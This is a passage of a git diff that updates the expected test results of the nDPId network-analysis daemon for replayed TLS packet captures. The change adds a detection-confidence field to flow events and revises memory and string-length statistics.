 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596906 bytes
-~~ total memory freed........: 4596906 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4681859 bytes
+~~ total memory freed........: 4681859 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 2422 chars
diff --git a/test/results/443-curl.pcap.out b/test/results/443-curl.pcap.out
index 4e190cd68..a28a8fd14 100644
--- a/test/results/443-curl.pcap.out
+++ b/test/results/443-curl.pcap.out
@@ -3,10 +3,10 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00864{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01066{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 109/109
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602906 bytes
-~~ total memory freed........: 4602906 bytes
-~~ total allocations/frees...: 99668/99668
+~~ total memory allocated....: 4687859 bytes
+~~ total memory freed........: 4687859 bytes
+~~ total allocations/frees...: 101258/101258
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 1071 chars
-~~ json string avg len.......: 668 chars
+~~ json string max len.......: 1097 chars
+~~ json string avg len.......: 681 chars
diff --git a/test/results/443-firefox.pcap.out b/test/results/443-firefox.pcap.out
index 7e5d1528d..13e399df7 100644
--- a/test/results/443-firefox.pcap.out
+++ b/test/results/443-firefox.pcap.out
@@ -3,10 +3,10 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01132{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
-00656{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 667/667
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4619142 bytes
-~~ total memory freed........: 4619142 bytes
-~~ total allocations/frees...: 100227/100227
+~~ total memory allocated....: 4704095 bytes
+~~ total memory freed........: 4704095 bytes
+~~ total allocations/frees...: 101817/101817
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 1137 chars
-~~ json string avg len.......: 701 chars
+~~ json string max len.......: 1163 chars
+~~ json string avg len.......: 714 chars
diff --git a/test/results/443-git.pcap.out b/test/results/443-git.pcap.out
index 4ce4bd37b..be0d773d2 100644
--- a/test/results/443-git.pcap.out
+++ b/test/results/443-git.pcap.out
@@ -3,10 +3,10 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"}
-00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00870{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01174{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}}
-00661{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
